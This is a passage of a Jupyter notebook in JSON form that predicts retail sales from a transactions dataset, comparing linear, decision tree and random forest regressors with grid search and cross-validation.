prefix='qr')\ndf_data = pd.get_dummies(df_data, columns=['PriceRange'], prefix='pr')\ndf_data = pd.get_dummies(df_data, columns=['DateRange'], prefix='dr')\ndf_data.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"f-SPb1vS8WJp","colab_type":"text"},"cell_type":"markdown","source":"## 5.3. Scaling"},{"metadata":{},"cell_type":"markdown","source":"As the majority of our features are in 0-1 range it would make sense to scale \"QuantityInv\" feature too. 
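A small variant of the scaling step below, kept here only as a sketch: StandardScaler performs the same standardisation as scale() but remembers the fitted mean and std, so the identical transformation could later be applied to the non-UK data when testing the hypothesis from 5.1 (and, ideally, it would be fit on the training split only):

```python
from sklearn.preprocessing import StandardScaler

# Same standardisation as scale(), but the fitted statistics stay on the scaler object
scaler = StandardScaler()
df_data['QuantityInv'] = scaler.fit_transform(df_data[['QuantityInv']]).ravel()

# The stored statistics could then be reused on a hypothetical abroad frame built the same way:
# df_abroad_data['QuantityInv'] = scaler.transform(df_abroad_data[['QuantityInv']]).ravel()
```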
In general, scaling features is normally a good idea."},{"metadata":{"id":"pZknqQll1XwF","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"from sklearn.preprocessing import scale\ndf_data['QuantityInv'] = scale(df_data['QuantityInv'])","execution_count":null,"outputs":[]},{"metadata":{"id":"ubjfXWh18gyd","colab_type":"text"},"cell_type":"markdown","source":"## 5.4. Train-Test Split"},{"metadata":{},"cell_type":"markdown","source":"Now we have to split our data into train-test data to be able to train our model and validate its capabilities."},{"metadata":{"id":"PzvfoUoP1x3_","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"y = df_data['Sales']\nX = df_data.drop(columns=['Sales'])","execution_count":null,"outputs":[]},{"metadata":{"id":"PgddlfS31-EG","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"from sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state=42)","execution_count":null,"outputs":[]},{"metadata":{"id":"PuVn7UAz8vU0","colab_type":"text"},"cell_type":"markdown","source":"## 5.5. Testing and validating different models"},{"metadata":{},"cell_type":"markdown","source":"Here we use GridSearch and CrossValidation to test three types of regressors: Linear, DecisionTree and RandomForest. This can take a while..."},{"metadata":{"id":"5tvAeU4J2NgQ","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":674},"outputId":"c2845c6a-69aa-4193-b46c-a7f1439e9c1d","trusted":true},"cell_type":"code","source":"from sklearn.model_selection import KFold\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom sklearn.model_selection import GridSearchCV\n\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\n\n# Linear Regression\nfit_intercepts = [True, False]\nparam_grid_linear = dict(fit_intercept=fit_intercepts)\nlinear_model = LinearRegression()\n\n# Decision Tree\nmin_tree_splits = range(2,5)\nmin_tree_leaves = range(1,4)\nparam_grid_tree = dict(min_samples_split=min_tree_splits,\n min_samples_leaf=min_tree_leaves)\ntree_model = DecisionTreeRegressor()\n\n# Random Forest\nestimators_space = [100]\nmin_sample_splits = range(2,4)\nmin_sample_leaves = range(1,3)\nparam_grid_forest = dict(min_samples_split=min_sample_splits,\n min_samples_leaf=min_sample_leaves,\n n_estimators=estimators_space)\nforest_model = RandomForestRegressor()\n\ncv = 5\n\nmodels_to_test = ['LinearRegression','DecisionTreeRegressor','RandomForest']\nregression_dict = dict(LinearRegression=linear_model,\n DecisionTreeRegressor=tree_model,\n RandomForest=forest_model)\nparam_grid_dict = dict(LinearRegression=param_grid_linear,\n DecisionTreeRegressor=param_grid_tree,\n RandomForest=param_grid_forest)\n\nscore_dict = {}\nparams_dict = {}\nmae_dict = {}\nmse_dict = {}\nr2_dict = {}\nbest_est_dict = {}\n\nfor model in models_to_test:\n regressor = GridSearchCV(regression_dict[model], param_grid_dict[model], cv=cv, n_jobs=-1)\n\n regressor.fit(X_train, y_train)\n y_pred = regressor.predict(X_test)\n\n # Print the tuned parameters and score\n print(\" === Start report for regressor {} ===\".format(model))\n score_dict[model] = regressor.best_score_\n print(\"Tuned Parameters: {}\".format(regressor.best_params_)) \n params_dict = regressor.best_params_\n print(\"Best 
score is {}\".format(regressor.best_score_))\n\n # Compute metrics\n mae_dict[model] = mean_absolute_error(y_test, y_pred)\n print(\"MAE for {}\".format(model))\n print(mean_absolute_error(y_test, y_pred))\n mse_dict[model] = mean_squared_error(y_test, y_pred)\n print(\"MSE for {}\".format(model))\n print(mean_squared_error(y_test, y_pred))\n r2_dict[model] = r2_score(y_test, y_pred)\n print(\"R2 score for {}\".format(model))\n print(r2_score(y_test, y_pred))\n print(\" === End of report for regressor {} === \\n\".format(model))\n \n # Add best estimator to the dict\n best_est_dict[model] = regressor.best_estimator_\n\n","execution_count":null,"outputs":[]},{"metadata":{"id":"SwIYIT1QC4yS","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":315},"outputId":"a6b94f76-815c-495e-fafc-eed8a452f409","trusted":true},"cell_type":"code","source":"# Creating summary report\nsummary_cols = ['Best Score']\nsummary = pd.DataFrame.from_dict(r2_dict, orient='index')\nsummary.index.name = 'Regressor'\nsummary.columns = summary_cols\nsummary = summary.reset_index()\n\n# Visualizing results\nplt.figure(figsize=(12,4))\nplt.xlabel('Best score')\nplt.title('Regressor Comparison')\n\nsns.barplot(x='Best Score', y='Regressor', data=summary)","execution_count":null,"outputs":[]},{"metadata":{"id":"ns3-4B4sD5pe","colab_type":"text"},"cell_type":"markdown","source":"# Conclusions\n"},{"metadata":{"id":"anKJ0JZFELV4","colab_type":"text"},"cell_type":"markdown","source":"This is a basic analysis of a transactions dataset with a model that predicts sales. Still a lot of things can be improved:\n\n\n* Perform cluster analysis and create features based on it\n* Make a deeper split of dates\n* Get more insights from Descriptions and Stock numbers\n* Compare domestic and abroad sales\n* Try deep learning models\n\nAlso we can play much more with tuning of hyperparameters of our models and give it more time for training.\n\nRandom Forest Regressor appears to be the best model for our prediction with R2 score more than 0.6 which is not that bad. \n\n"}],"metadata":{"colab":{"name":"Data Scientist test2.ipynb","provenance":[]},"kernelspec":{"name":"python3","display_name":"Python 3"}},"nbformat":4,"nbformat_minor":1} --------------------------------------------------------------------------------